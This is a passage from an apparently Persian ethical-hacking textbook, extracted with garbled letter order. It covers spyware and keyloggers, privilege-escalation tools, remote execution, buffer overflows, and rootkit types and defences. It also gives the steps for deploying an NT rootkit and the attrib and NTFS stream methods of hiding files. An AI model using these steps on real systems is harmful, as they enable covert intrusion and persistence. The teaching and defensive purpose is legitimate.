اﺑﺰارﻫﺎي ﻫﻚ Spector ، ﻳﻚ ﻧﺮم اﻓﺰار ﺟﺎﺳﻮﺳﻲ ( spyware ) اﺳﺖ ﻛﻪ ﺗﻤﺎم ﻲﻳﺎﻫرﺎﻛ ﻛﻪ در اﻳﻨﺘﺮﻧﺖ اﻧﺠﺎم ﻣﻲ ﺷﻮد را ﻣﺜﻞ دورﺑﻴﻦ ﺿﺒﻂ ﻣﻲ ﻛﻨﺪ . اﻳﻦ ﻧﺮم اﻓﺰار، ﺑﺼﻮرت ﺧﻮدﻛﺎر در ﻫﺮ ﺳﺎﻋﺖ، ﺻﺪﻫﺎ ﻋﻜﺲ از ﺻﻔﺤﻪ ﻣﺎﻧﻴﺘﻮر ﻣﻲ ﮔﻴﺮد و آﻧﻬﺎ را در ﻣﻜﺎﻧﻲ ﻣﺨﻔﻲ روي ﻫﺎرد ﺳﻴﺴﺘﻢ ذﺧﻴﺮه ﻣﻲ ﻛﻨﺪ . Anti-spector ﻣﻲ ﺗﻮاﻧﺪ اﻳﻦ ﻧﺮم اﻓﺰار را ﺗﺸﺨﻴﺺ دﻫﺪ و آن را ﺣﺬف ﻛﻨ .ﺪ .ﺪ

76

eBlaster ، ﻧﺮم اﻓﺰار ﺟﺎﺳﻮﺳﻲ اﻳﻨﺘﺮﻧﺘﻲ اﺳﺖ ﻛﻪ اﻳﻤﻴﻞ ﻫﺎي ورودي و ﺧﺮوﺟﻲ را درﻳﺎﻓﺖ ﻣﻲ ﻛﻨﺪ و ﺑﻼﻓﺎﺻﻠﻪ آﻧﻬﺎ را ﺑﻪ آدرس اﻳﻤﻴﻞ دﻳﮕﺮي ﻓﺮوارد ﻣﻲ ﻛﻨﺪ . eBloster ، ﻣﻲﺗﻮاﻧﺪ ﻫﺮ دو ﻃﺮف ﻳﻚ ﻣﻜﺎﻟﻤﻪ ﻣﺴﻨﺠﺮ را ﺑﮕﻴﺮد و آﻧﻬﺎ را ﺒﺿ ﻂ ﻛﻨﺪ و ﻫﻤﭽﻨﻴﻦ وب ﺳﺎﻳﺖ ﻫﺎي ﻣﺸﺎﻫﺪه ﺷﺪه را ﺛﺒﺖ ﻛﻨﺪ . .

SpyAnywhere ، اﺑﺰاري اﺳﺖ ﻛﻪ ﺑﻪ ﺷﻤﺎ اﺟﺎزه ﻣﻲ دﻫﺪ ﻓﻌﺎﻟﻴﺖ ﺳﻴﺴﺘﻢ و اﻋﻤﺎل ﻛﺎرﺑﺮ را ﺑﺒﻴﻨﻴﺪ، ﺳﻴﺴﺘﻢ را ﺧﺎﻣﻮش، رﻳﺴﺘﺎرت ﻛﻨﻴﺪ و ﺣﺘﻲ ﻓﺎﻳﻞ ﺳﻴﺴﺘﻢ راه دور را ﺑﺒﻴﻨﻴﺪ . SpyAnywhere ، ﺑﻪ ﺷﻤﺎ اﺟﺎزه ﻣﻲ دﻫﺪ ﺑﺮﻧﺎﻣﻪ ﻫﺎ و ﭘﻨﺠﺮه ﻫﺎي ﺑﺎز را روي ﺳﻴﺴﺘﻢ راه دور ﻛﻨﺘﺮل ﻛﻨﻴﺪ و history اﻳﻨﺘﺮﻧﺘﻲ و اﻃﻼﻋﺎت ﻣﺮﺑﻮﻃﻪ را ﺑﺒﻴﻨﻴﺪ . .

Fearless Key Logger ، ﺗﺮوﺟﺎﻧﻲ اﺳﺖ ﻛﻪ در ﺣﺎﻓﻈﻪ ﺑﺎﻗﻲ ﻣﻲ ﻣﺎﻧﺪ ﺗﺎ ﺗﻤﺎم ﺿﺮﺑﺎت ﻛﻠﻴﺪ ﻛﺎرﺑﺮ را ﺑﺪﺳﺖ آورد . ﻛﻠﻴﺪﻫﺎي زده ﺷﺪه، در ﻓﺎﻳﻞ log ذﺧﻴﺮه ﻣﻲ ﺷﻮﻧﺪ و ﻣﻲ ﺗﻮاﻧﺪ ﺗﻮﺳﻂ ﻫﻜﺮ ﺑﺎزﻳﺎﺑﻲ ﺷﻮد . .

E-mail Keylogger ، ﺗﻤﺎم اﻳﻤﻴﻞ ﻫﺎي ﻓﺮﺳﺘﺎده و درﻳﺎﻓﺖ ﺷﺪه روي ﺳﻴﺴﺘﻢ ﻫﺪف را ﺛﺒﺖ ﻣﻲ ﻛﻨﺪ . اﻳﻤﻴﻞ ﻫﺎ ﻣﻲ ﺗﻮاﻧﻨﺪ ﺗﻮﺳﻂ ارﺳﺎل ﻛﻨﻨﺪه، درﻳﺎﻓﺖ ﻛﻨﻨﺪه، ﻣﻮﺿﻮع، و ﺗﺎرﻳﺦ/ ﺳﺎﻋﺖ ﻣﺸﺎﻫﺪه ﺷﻮﻧﺪ . ﻣﺤﺘﻮاي اﻳﻤﻴﻞ و ﻫﺮ ﺿﻤﻴﻤﻪ دﻳﮕﺮ، ﺿﺒﻂ ﻣﻲ ﺷﻮد . .

ﺑﺮﺧﻲ دﻳﮕﺮ از ﻧﺮم اﻓﺰارﻫﺎي Keylogger ﻋﺒﺎرﺗﻨﺪ از : : • Revealer Keylogger • Handy Key Logger • Ardamax Keylogger • Powered Keylogger • ELITE Keylogger • Quick Keylogger • Spy-Keylogger • Perferct Keylogger • Invisible Keylogger • Actual Spy • Spytector FTP Keylogger • IKS Software Keylogger • Ghost Keylogger

د ﺳﺘﺮﺳﻲ ﻫﺎي ﺿ ﺮوري

اﻓﺰاﻳﺶ ﺳﻄﺢ دﺳﺘﺮﺳﻲ، ﺳﻮﻣﻴﻦ ﻣﺮﺣﻠﻪ در ﭼﺮﺧﻪ ﻫﻚ اﺳﺖ . اﻓﺰاﻳﺶ ﺳﻄﺢ دﺳﺘﺮﺳﻲ، ﺑﻪ اﻳﻦ ﻣﻌﻨﺎﺳﺖ ﻛﻪ ﻣﺠﻮزﻫﺎ و ﺣﻘﻮق ﻳﻚ ﺣﺴﺎب ﻛﺎرﺑﺮي اﻓﺰاﻳﺶ ﻳﺎﺑﺪ . در واﻗﻊ، اﻓﺰاﻳﺶ ﺳﻄ ﺢ دﺳﺘﺮﺳﻲ، ﺑﻪ ﻣﻌﻨﺎي اﻓﺰاﻳﺶ ﺳﻄ ﺢ دﺳﺘﺮﺳﻲ ﻳﻚ ﺣﺴﺎب ﻛﺎرﺑﺮي ﺑﻪ اﻧﺪازه ﺣﺴﺎب ﻣﺪﻳﺮ اﺳﺖ . .

77

ﺑﻄﻮر ﻛﻠﻲ، ﺣﺴﺎب ﻫﺎي ﻣﺪﻳﺮ، ﺑﺎﻳﺪ داراي ﭘﺴﻮردﻫﺎي ﻗﻮي ﺗﺮ ﺑﺎﺷ ﺪﻨ . اﮔﺮ ﻫﻜﺮ ﻧﺘﻮاﻧﺪ ﻧﺎم ﻛﺎرﺑﺮي و ﭘﺴﻮرد ﻣﺪﻳﺮ ﺳﻴﺴﺘﻢ را ﭘﻴﺪا ﻛﻨﺪ، ﺑﻪ دﻧﺒﺎل ﺣﺴﺎﺑﻲ ﺑﺎ دﺳﺘﺮﺳﻲ ﭘﺎﻳﻴﻦ ﺗﺮي ﻣﻲ ﮔﺮدد و در اﻳﻦ ﺣﺎﻟﺖ، ﻫﻜﺮ ﺑﻪ دﻧﺒﺎل اﻓﺰاﻳﺶ ﺳﻄﺢ دﺳﺘﺮﺳﻲ اﻳﻦ ﺣﺴﺎب اﺳﺖ . .

زﻣﺎﻧﻴﻜﻪ ﻫﻜﺮ اﻛﺎﻧﺖ و ﭘﺴﻮرد ﻣﻌﺘﺒﺮي را ﺑﺪﺳﺖ آورد، در ﻣﺮﺣﻠﻪ ﺑﻌﺪي ﺑﻪ دﻧﺒﺎل اﺟﺮاي ﺑﺮﻧﺎﻣﻪ ﻫﺎي اﺳﺖ . ﺑﻄﻮر ﻛﻠﻲ، ﻫﻜﺮ ﻧﻴﺎز دارد ﻛﻪ ﺣﺴﺎﺑﻲ ﺑﺎ دﺳﺘﺮﺳﻲ administrator داﺷﺘﻪ ﺑﺎﺷﺪ ﺗﺎ ﺑﺘﻮاﻧﺪ ﺑﺮﻧﺎﻣﻪ ﻫﺎ را ﻧﺼﺐ ﻛﻨﺪ و ﺑﻪ ﻫﻤﻴﻦ ﺧﺎﻃﺮ ، اﻓﺰاﻳﺶ ﺳﻄﺢ دﺳﺘﺮﺳﻲ، ﺑﺴﻴﺎر ﻣﻬﻢ اﺳﺖ . .

اﺑﺰارﻫﺎي ﻫﻚ

GetAdmin.exe ، ﺑﺮﻧﺎﻣﻪ ﻛﻮﭼﻜﻲ اﺳﺖ ﻛﻪ ﻛﺎرﺑﺮي را ﺑﻪ ﮔﺮوه administrator اﺿﺎﻓﻪ ﻣﻲ ﻛﻨﺪ . اﻳﻦ ﺑﺮﻧﺎﻣﻪ از ﻫﺴﺘﻪ ﺳﻄﺢ ﭘﺎﻳﻴﻦ NT اﺳﺘﻔﺎده ﻣﻲ ﻛﻨﺪ ﺗﺎ ﺑﻪ ﭘﺮدازش ﻫﺎي در ﺣﺎل اﺟﺮا دﺳﺘﺮﺳﻲ ﭘﻴﺪا ﻛﻨﺪ . ﺑﺮاي اﺟﺮاي ﺑﺮﻧﺎﻣﻪ، ورود ﺑﻪ ﻛﻨﺴﻮل ﺳﺮور ﺿﺮوري اﺳﺖ . GetAdmin.exe ، از ﻃﺮﻳﻖ دﺳﺘﻮر ﻳﺎ ﻣﺮوﮔﺮ اﺟﺮا ﻣﻲ ﺷﻮد . ﺗﻨﻬﺎ ﺑﺮ روي Windows NT SP3 4.0 ﻛﺎر ﻣﻲ ﻛﻨﺪ . .

ﺑﺎ اﺳﺘ ﻔﺎده از ﺑﺮﻧﺎﻣﻪ HK.exe ، ﻣﻲ ﺗﻮاﻧﻴﺪ ﻛﺎرﺑﺮي ﻛﻪ admin ﻧﻴﺴﺖ ﺑﻪ ﮔﺮوه administrator اﺿﺎﻓﻪ .ﺪﻴﻨﻛ .ﺪﻴﻨﻛ

Active@ Password Changer ، ﺑﺮاي ﺴﻳر ﺖ ﻛﺮدن ﭘﺴﻮرد ﺣﺴﺎب administrator ﺑﺼﻮرت local اﺳﺖ . .

اﺑﺰار x.exe ، زﻣﺎﻧﻴﻜﻪ ﺑﺮ روي ﺳﻴﺴﺘﻢ راه دور اﺟﺮا ﻣﻲ ﺷﻮد، ﻛﺎرﺑﺮي ﺑﺎ ﻧﺎم X و ﭘﺴﻮرد X ﻣﻲ ﺳﺎزد و آن را ﻋﻀﻮ ﮔﺮوه administrator ﻣﻲ ﻛﻨﺪ . .

اﺟﺮاي ﺑﺮﻧﺎﻣﻪ ﻫﺎ ﻫﺎ

زﻣﺎﻧﻴﻜﻪ ﻫﻜﺮ ﺗﻮاﻧﺴﺖ ﺑﻪ ﺣﺴﺎﺑﻲ ﺑﺎ ﺳﻄﺢ دﺳﺘﺮﺳﻲ administrator ، دﺳﺘﺮﺳﻲ ﭘﻴﺪا ﻛﻨﺪ، ﻣﺮﺣﻠﻪ ﺑﻌﺪي ﻛﻪ اﻧﺠﺎم ﻣﻲ دﻫﺪ اﻳﻦ اﺳﺖ ﻛﻪ ﺑﺮﻧﺎﻣﻪ ﻫﺎ را روي ﺳﻴﺴﺘﻢ ﻫﺪف اﺟﺮا ﻛﻨﺪ . ﻣﻤﻜﻦ اﺳﺖ ﻫﺪف اﺟﺮاي ﺑﺮﻧﺎﻣﻪ ﻫﺎ، ﻧﺼﺐ back door ( در ﭘﺸﺘﻲ ) روي ﺳﻴﺴﺘﻢ، ﻧﺼﺐ ﻳﻚ keystroke logger ﺑﺮاي ﺟﻤﻊ آوري اﻃﻼﻋﺎت ﻣﺤﺮﻣﺎﻧﻪ، ﻛﭙﻲ ﻓﺎﻳﻞ ﻫﺎ، ﻳﺎ ﻓﻘﻂ ﺑﺮاي آﺳﻴﺐ رﺳﺎﻧﺪن ﺑﻪ ﺳﻴﺴﺘﻢ ﺑﺎﺷﺪ . زﻣﺎﻧﻴﻜﻪ ﻫﻜﺮ ﺗﻮاﻧﺴﺖ ﺑﺮﻧﺎﻣﻪ ﻫﺎ را اﺟﺮا ﻛﻨﺪ، ﻣﺎﻟﻚ ﺳﻴﺴﺘﻢ ﻣﻲ ﺷﻮد . .

78

اﺑﺰارﻫﺎي ﻫﻚ

PsExec ، ﺑﺮﻧﺎﻣﻪ اي اﺳﺖ ﻛﻪ ﺑﻪ ﺳﻴﺴﺘﻢ راه دور ﻣﺘﺼﻞ ﻣﻲ ﺷﻮد و ﻓﺎﻳﻞ ﻫﺎ را اﺟﺮا ﻣﻲ ﻛﻨﺪ . ﻧﻴﺎزي ﺑﻪ ﻧﺼﺐ ﺑﺮﻧﺎﻣﻪ روي ﺳﻴﺴﺘﻢ راه دور ﻧﻴﺴﺖ . .

Remoxec ، ﺑﺮﻧﺎﻣﻪ اي اﺳﺖ ﻛﻪ ﺑﺎ اﺳﺘﻔﺎده از ﺳﺮوﻳﺲ RPC ﻳﺎ DCOM ﻛﺎر ﻣﻲ ﻛﻨﺪ . ﻣﺪﻳﺮاﻧﻲ ﻛﻪ ﭘﺴﻮرد ﺿﻌﻴﻒ دارﻧﺪ ﻣﻤﻜﻦ اﺳﺖ از ﻃﺮﻳﻖ Task Scheduler ﻳﺎ DCOM ﻣﻮرد ﺳﻮ اﺳﺘﻔﺎده ﻗﺮار ﮔﻴﺮﻧﺪ . .

Alchemy Remote Executer ، اﺑﺰار ﻣﺪﻳﺮﻳﺘﻲ ﺑﺮاي ﻣﺪﻳﺮان اﺳﺖ ﻛﻪ ﺑﺘﻮاﻧﻨﺪ ﺑﺮﻧﺎﻣﻪ ﻫﺎ را روي ﻛﺎﻣﭙﻴﻮﺗﺮﻫﺎي ﺷﺒﻜﻪ از راه دور اﺟﺮا ﻛﻨﻨﺪ . .

Esma FlexInfo Pro ، اﺑﺰاري ﺑﺮاي ﻧﻤﺎﻳﺶ اﻃﻼﻋﺎت و ﺗﻨﻈﻴﻤﺎت ﺳﻴﺴﺘﻢ ﻫﺎ ا ﺳﺖ ﻛﻪ ﺷﺎﻣﻞ اﺑﺰارﻫﺎﻳﻲ ﻫﻤﭽﻮن ﮔﺮاف CPU usage ، ﻣﺎﻧﻴﺘﻮر ﭘﻬﻨﺎي ﺑﺎﻧﺪ و ... اﺳﺖ . .

Buffer Overflows

Buffer overflows ( ﺳﺮرﻳﺰي ﺑﺎﻓﺮ) ، ﺗﻼش ﻫﻜﺮ ﺑﺮاي ﺳﻮ اﺳﺘﻔﺎده از ﻋﻴﺐ ﻳﻚ ﺑﺮﻧﺎﻣﻪ اﺳﺖ . در اﺻﻞ، ﺣﻤﻠﻪ ﺳﺮرﻳﺰي ﺑﺎﻓﺮ، اﻃﻼﻋﺎت ﺑﺴﻴﺎر زﻳﺎدي را ﺑﻪ ﻳﻚ ﻓﻴﻠﺪ ﻣﺘﻐﻴﺮ در ﻳﻚ ﺑﺮﻧﺎﻣﻪ ﻣﻲ ﻓﺮﺳﺘﺪ ﻛﻪ ﻣﻨﺠﺮ ﺑﻪ ﺧﻄﺎي ﺑﺮﻧﺎﻣﻪ ﻣﻲ ﺷﻮد . اﻏﻠﺐ اوﻗﺎت، ﺑﺮﻧﺎﻣﻪ ﻧﻤﻲ داﻧﺪ ﻛﻪ در اﻳﻦ ﺣﺎﻟﺖ ﭼﻴﻜﺎر ﻛﻨﺪ ﺑﻨﺎﺑﺮاﻳﻦ، ﻳﺎ دﺳﺘﻮرات را اﺟﺮا ﻣﻲ ﻛﻨﺪ ﻳﺎ دﺳﺘﻮر را رد ﻣﻲ ﻛﻨﺪ و ﺑﻪ ﻛﺎرﺑﺮ اﺟﺎزه ﻣﻲ دﻫﺪ ﻛﻪ دﺳﺘﻮر ﺑﻌﺪي را وارد ﻛﻨﺪ . ﺑﺮاي ﻫﻜﺮ، cmd ﻳﺎ shell ، ﻛﻠﻴﺪ اﺟﺮاي ﺑﺮﻧﺎﻣﻪ ﻫﺎي دﻳﮕﺮ اﺳﺖ . .

Rootkit ﻫﺎ ﻫﺎ

Rootkit ، ﻧﻮﻋﻲ ﺑﺮﻧﺎﻣﻪ اﺳﺖ ﻛﻪ اﻏﻠﺐ ﺑﺮاي ﻣﺨﻔﻲ ﻛﺮدن ﺑﺮﻧﺎﻣﻪ ﻫﺎ روي ﺳﻴﺴﺘﻢ ﻗﺮﺑﺎﻧﻲ ﺑ ﻪ ﻛﺎر ﻣﻲ رود . Rootkit ﻫﺎ ﺷﺎﻣﻞ backdoor ﻫﺴﺘﻨﺪ ﺗﺎ ﺑﻪ ﻫﻜﺮ ﻛﻤﻚ ﻛﻨﺪ ﺑﻄﻮر ﻣﺘﻮاﻟﻲ و راﺣﺖ ﺑﻪ ﺳﻴﺴﺘﻢ دﺳﺘﺮﺳﻲ ﭘﻴﺪا ﻛﻨﺪ . ﻫﻤﭽﻨﻴﻦ ﻳﻚ backdoor ﻣﻤﻜﻦ اﺳﺖ اﺟﺎزه ﺷﺮوع ﭘﺮدازش ﻫﺎ را ﺗﻮﺳﻂ ﻳﻚ ﺣﺴﺎب ﻣﺤﺪود ﺑﺪﻫﺪ . Rootkit ، ﺑﻄﻮر ﭘﻴﻮﺳﺘﻪ ﺗﻮﺳﻂ ﺑﺮﻧﺎﻣﻪ ﻧﻮﻳﺲ rootkit ﻣﻮرد اﺳﺘﻔﺎده ﻗﺮار ﻣﻲ ﮔﻴﺮد ﺗﺎ ﺑﺘﻮاﻧﻨﺪ ﻧﺎم ﻫﺎي ﻛﺎرﺑﺮي و اﻃﻼﻋﺎت ﻻﮔﻴﻦ ﺳﺎﻳﺖ ﻫﺎﻳﻲ ﻛﻪ ﺑﻪ آﻧﻬﺎ ﻧﻴﺎز دارﻧﺪ را ﺑﺒﻴﻨﺪ و دﺳﺘﺮﺳﻲ ﭘﻴﺪا ﻛﻨﻨﺪ . .

79

ﭼﻨﺪﻳﻦ ﻧﻮع rootkit وﺟﻮد دارﻧﺪ ﻛﻪ ﻋﺒﺎرﺗﻨﺪ از : :

Kernel-level rootkits : اﻳﻦ دﺳﺘﻪ از rootkit ﻫﺎ، ﻛﺪي را ﺑﻪ ﻗﺴﻤﺘﻲ از ﻛﺪ ﻫﺴﺘﻪ اﺿﺎﻓﻪ ﻣﻲ ﻛﻨﻨﺪ ﻳﺎ آن را ﺟﺎﻳﮕﺰﻳﻦ ﻣﻲ ﻛﻨﻨﺪ ﺗﺎ door back را روي ﺳﻴﺴﺘﻢ، ﻣﺨﻔﻲ ﻧﮕﻪ دار ﺪﻧ . ﻣﻌﻤﻮﻻ ﻛﺪ ﺟﺪﻳﺪي را از ﻃﺮﻳﻖ دراﻳﻮر دﺳﺘﮕﺎه ﻳﺎ ﻣﺎژول ﻫﺎ ﺑﻪ ﻛﺮﻧﻞ اﺿﺎﻓﻪ ﻣﻲ ﻨﻛ ﻨﺪ . Kernel-level rootkit ﻫﺎ، ﺑﺴﻴﺎر ﺧﻄﺮﻧﺎك ﻫﺴﺘﻨﺪ ﺑﺮاي اﻳﻨﻜﻪ ﺑﺪون اﺳﺘﻔﺎده از ﻧﺮم اﻓﺰار ﻣﻨﺎﺳﺐ، ﺷﻨﺎﺳﺎﻳﻲ آﻧﻬﺎ ﺑﺴﻴﺎر ﺳﺨﺖ ﺗﺮ اﺳﺖ . .

Library-level rootkits : اﻳﻦ دﺳﺘﻪ از rootkit ﻫﺎ، ﻓﺮاﺧﻮاﻧﻲ ﺳﻴﺴﺘﻢ ( library ) را ﺑﺎ ﻧﺴﺨﻪ اي دﻳﮕﺮ ﻛﻪ اﻃﻼﻋﺎت ﻫﻜﺮ را ﻣﺨﻔﻲ ﻣﻲ ﻛﻨﺪ، ﺟﺎﻳﮕﺰﻳﻦ ﻣﻲ ﻛﻨﻨﺪ . .

Application-level rootkits : اﻳﻦ دﺳﺘﻪ از rootkit ﻫﺎ، ﺑﻴﺖ ﻫﺎي ﺑﺎﻳﻨﺮي ﺑﺮﻧﺎﻣﻪ ﻫﺎ را ﺑﺎ ﺗﺮوﺟﺎن ﻫﺎ ﺟﺎﻳﮕﺰﻳﻦ ﻣﻲ ﻛﻨﺪ ﻳﺎ ﻣﻤﻜﻦ اﺳﺖ ﻛﻪ رﻓﺘﺎر ﺑﺮﻧﺎﻣﻪ ﻣﻮﺟﻮد را از ﻃﺮﻳﻖ patch ﻫﺎ، ﻛﺪﻫﺎي ﺗﺰﻳﻖ ﺷﺪه، ﻳﺎ اﺑﺰارﻫﺎي دﻳﮕﺮ، ﺗﻐﻴﻴﺮ دﻫﺪ . .

ﻧﺼﺐ Rootkit ﻫﺎ ﺑﺮ روي ﻛﺎﻣﭙﻴﻮﺗﺮﻫﺎي وﻳﻨﺪوز 2000 و XP

Windows NT/2000 rootkit ، ﺑﻄﻮر اﺗﻮﻣﺎﺗﻴﻚ ﻫﻨﮕﺎه اﺟﺮاي وﻳﻨﺪوز، ﺑﺎرﮔﺬاري ﻣﻲ ﺷﻮد . Rootkit ، ﺑﺎ دﺳﺘﺮﺳﻲ ﺳﻴﺴﺘﻤﻲ در ﻫﺴﺘﻪ NT kernel ﻛﺎر ﻣﻲ ﻛﻨﺪ ﺑﻨﺎﺑﺮاﻳﻦ، ﺑﻪ ﻫﻤﻪ ﻣﻨﺎﺑﻊ ﺳﻴﺴﺘﻢ ﻋﺎﻣﻞ دﺳﺘﺮﺳﻲ دارد . Rootkit ﻣﻲ ﺗﻮاﻧﺪ ﭘﺮدازش ﻫﺎ را ﻣﺨﻔﻲ ﻛﻨﺪ، ﻓﺎﻳﻞ ﻫﺎ را ﻣﺨﻔﻲ ﻛﻨﺪ، ﻣﻘﺎدﻳﺮ رﺟﻴﺴﺘﺮي را ﻣﺨﻔﻲ ﻛﻨﺪ، وﻗﻔﻪ اﻳﺠﺎد ﻛ ﻨﺪ ﺗﺎ blue scrren ﻇﺎﻫﺮ ﺷﻮد، و ﻓﺎﻳﻞ ﻫﺎي EXE را ﺗﻐﻴﻴﺮ ﻣﺴﻴﺮ دﻫﺪ . .

Rootkit ، ﺷﺎﻣﻞ ﻳﻚ kernel mode device driver ﻛﻪ root_.sys_ ﻧﺎم دارد و ﻳﻚ ﺑﺮﻧﺎﻣﻪ اﺟﺮا ﻛﻨﻨﺪه ﻛﻪ DEPLOY.EXE ﻧﺎم دارد، اﺳﺖ . ﭘﺲ از اﻳﺠﺎد دﺳﺘﺮﺳﻲ ﺑﻪ ﺳﻴﺴﺘﻢ ﻫﺪف، ﻫﻜﺮ، root_.sys_ و DEPLOY.EXE را از ﺳﻴﺴﺘﻢ ﻫﺪف ﻛﭙﻲ ﻣﻲ ﻛﻨﺪ و DEPLOY.EXE را اﺟﺮا ﻣﻲ ﻛﻨﺪ . ﺳﭙﺲ دراﻳﻮر دﺳﺘﮕﺎه rootkit را ﻧﺼﺐ و ﺷﺮوع ﻣﻲ ﻛﻨﺪ . ﺳﭙﺲ DEPLOY.EXE را از ﺳﻴﺴﺘﻢ ﻫﺪف ﺣﺬف ﻣﻲ ﻛﻨﺪ . ﺳﭙﺲ، ﺑﺎ اﺳﺘﻔﺎده از دﺳﺘﻮر _net stop _root و _rootkit ، net start _root را stop و ﺳﭙﺲ restart ﻣﻲ ﻛﻨﺪ . زﻣﺎﻧﻴﻜﻪ rootkit ﺷﺮوع ﺑﻪ ﻛﺎر ﻛﺮد، ﻓﺎﻳﻞ root_.sys_ دﻳﮕﺮ در ﻟﻴﺴﺖ داﻳﺮﻛﺘﻮري ﻇﺎﻫﺮ ﻧﻤﻲ ﺷﻮد . .

80

ﻣﻘﺎﺑﻠﻪ ﺑﺎ rootkit ﻫﺎ ﻫﺎ

ﺗﻤﺎم rootkit ﻫﺎ ﺑﺮاي دﺳﺘﺮﺳﻲ ﺑﻪ ﺳﻴﺴﺘﻢ ﻫﺪف، ﻧﻴﺎز ﺑﻪ دﺳﺘﺮﺳﻲ administrator دارﻧﺪ ﺑﻨﺎﺑﺮاﻳﻦ، اﻣﻨﻴﺖ ﭘﺴﻮرد از اﻫﻤﻴﺖ ﺑﺎﻻﻳﻲ ﺑﺮﺧﻮردار اﺳﺖ . اﮔﺮ ﺷﻤﺎ ﻳﻚ rootkit را ﺷﻨﺎﺳﺎﻳﻲ ﻛﺮدﻳﺪ، ﺗﻮﺻﻴﻪ ﻣﻲ ﺷﻮد ﻛﻪ از اﻃﻼﻋﺎت ﺣﻴﺎﺗﻲ ﭘﺸﺘﻴﺒﺎن ﺗﻬﻴﻪ ﻛﻨﻴﺪ و ﺳﻴﺴﺘﻢ ﻋﺎﻣﻞ و ﺑﺮﻧﺎﻣﻪ ﻫﺎ را دوﺑﺎره از ﻣﻨﺒﻊ ﻗﺎﺑﻞ اﻋﺘﻤﺎد ﻧﺼﺐ ﻛﻨﻴﺪ . .

روش دﻳﮕﺮ اﻳﻦ اﺳﺖ ﻛﻪ از اﺑﺰار MD5 checksum اﺳﺘﻔﺎده ﻛﻨﻴﺪ . ﺑﺮاي ﻳﻚ ﻓﺎﻳﻞ، MD5 checksum ، 128 ﺑﻴﺖ اﺳﺖ . اﮔﺮ ﻳﻜﻲ از ﺑﻴﺖ ﻫﺎي ﻳﻚ ﻓﺎ ﻳﻞ ﺗﻐﻴﻴﺮ ﻛﻨﺪ، ﻣﻘﺪار checksum در اﻳﻦ اﻟﮕﻮرﻳﺘﻢ ﻣﺘﻔﺎوت ﺧﻮاﻫﺪ ﺑﻮد . اﻳﻦ ﻗﺎﺑﻠﻴﺖ ﺑﺮاي ﻣﻘﺎﻳﺴﻪ ﻓﺎﻳﻞ ﻫﺎ و ﻣﻄﻤﺌﻦ ﺷﺪن از ﻳﻜﭙﺎرﭼﮕﻲ آﻧﻬﺎ، ﻣﻔﻴﺪ اﺳﺖ . ﻗﺎﺑﻠﻴﺖ ﺧﻮب دﻳﮕﺮ، ﻃﻮل ﺛﺎﺑﺖ checksum اﺳﺖ . .

اﺑﺰارﻫﺎي ﻫﻚ

Tripwire ، ﺑﺮﻧﺎﻣﻪ ﺑﺮرﺳﻲ ﻳﻜﭙﺎرﭼﮕﻲ ﻓﺎﻳﻞ ﺑﺮاي ﺳﻴﺴﺘﻢ ﻋﺎﻣﻞ ﻫﺎي ﻳﻮﻧﻴﻜﺲ و ﻟﻴﻨﻮﻛﺲ اﺳﺖ . ﻋﻼوه ﺑﺮ ﺑﺮرﺳﻲ checksum ﺑﺮ روي ﻓﺎﻳﻞ ﻫﺎ و داﻳﺮﻛﺘﻮري ﻫﺎ، Tripwire ، داراي اﻃﻼﻋﺎﺗﻲ اﺳﺖ ﻛﻪ ﺑﻪ ﺷﻤﺎ اﺟﺎزه ﻣﻲ دﻫﺪ ﻣﺠﻮزﻫﺎي دﺳﺘﺮﺳﻲ و ﺗﻨﻈﻴﻤﺎت ﻓﺎﻳﻞ، ﻧﺎم ﻛﺎرﺑﺮي ﻣﺎﻟﻚ، ﺗﺎرﻳﺦ و ﺳﺎﻋﺖ آﺧﺮﻳﻦ دﺳﺘﺮﺳﻲ ﺑﻪ آن ، و آﺧﺮﻳﻦ اﺻﻼح آن را ﺑﺮرﺳﻲ .ﺪﻴﻛﻨ .ﺪﻴﻛﻨ

ﻣﺨﻔﻲ ﻛﺮدن ﻓﺎﻳﻞ ﻫﺎ ﻫﺎ

ﻣﻤﻜﻦ اﺳﺖ ﻫﻜﺮي ﺑﺨﻮاﻫﺪ ﻛﻪ ﻓﺎﻳﻠﻲ را ﺑﺮ روي ﺳﻴﺴﺘﻢ ﻣﺨﻔﻲ ﻛﻨﺪ ﺗﺎ از ﺷﻨﺎﺳﺎﻳﻲ در اﻣﺎن ﺑﻤﺎﻧﺪ . ﺳﭙﺲ زا اﻳﻦ ﻓﺎﻳﻞ ﻫﺎ ﺑﺮاي ﺣﻤﻠﻪ ﺑﻪ ﺳﻴﺴﺘﻢ اﺳﺘﻔﺎده ﺪﻨﻛ . در وﻳﻨﺪوز، دو روش ﺑﺮاي ﻣﺨﻔﻲ ﻛﺮدن ﻓﺎﻳﻞ ﻫﺎ وﺟﻮد دارد . اوﻟﻴﻦ روش، اﺳﺘﻔﺎده از دﺳﺘﻮر attrib اﺳﺖ . ﺑﺮاي ﻣﺨﻔﻲ ﻛﺮدن ﻓﺎﻳﻞ ﺑﺎ اﺳﺘﻔﺎد ه از دﺳﺘﻮر attrib ، دﺳﺘﻮر زﻳﺮ را ﺗﺎﻳﭗ ﻛﻨﻴﺪ : :

Attrib +h [file/directory]

دوﻣﻴﻦ روش ﺑﺮاي ﻣﺨﻔﻲ ﻛﺮدن ﻓﺎﻳﻞ در وﻳﻨﺪوز، ﺑﺎ اﺳﺘﻔﺎده از ﺧﺎﺻﻴﺖ NTFS data streaming اﺳﺖ . ﺳﻴﺴﺘﻢ ﻓﺎﻳﻞ NTFS ، داراي ﻗﺎﺑﻠﻴﺘﻲ اﺳﺖ ﻛﻪ alternate data streams ﻧﺎﻣﻴﺪه ﻣﻲ ﺷﻮد ﻛﻪ داده ﻫﺎ را داﺧﻞ ﻓﺎﻳﻞ دﻳﮕﺮي ﻛﻪ ﻗﺎﺑﻞ روﻳﺖ اﺳﺖ، ﻣﺨﻔﻲ ﻣﻲ ﻛﻨﺪ . ﺑﻴﺸﺘﺮ از ﻳﻚ ﻓﺎﻳﻞ را ﻣﻲ ﺗﻮان ﺑﻪ ﻓﺎﻳﻞ اﺻﻠﻲ ﻟﻴﻨﻚ ﻛﺮد و ﻧﻴﺰ ﻣﺤﺪودﻳﺖ اﻧﺪازه ﻧﺪارد . .

81

NTFS File Streaming

ﺑﺮاي ﺳﺎﺧﺖ و ﺗﺴﺖ NTFS file stream ، ﻣﺮاﺣﻞ زﻳﺮ را اﻧﺠﺎم دﻫﻴﺪ : :

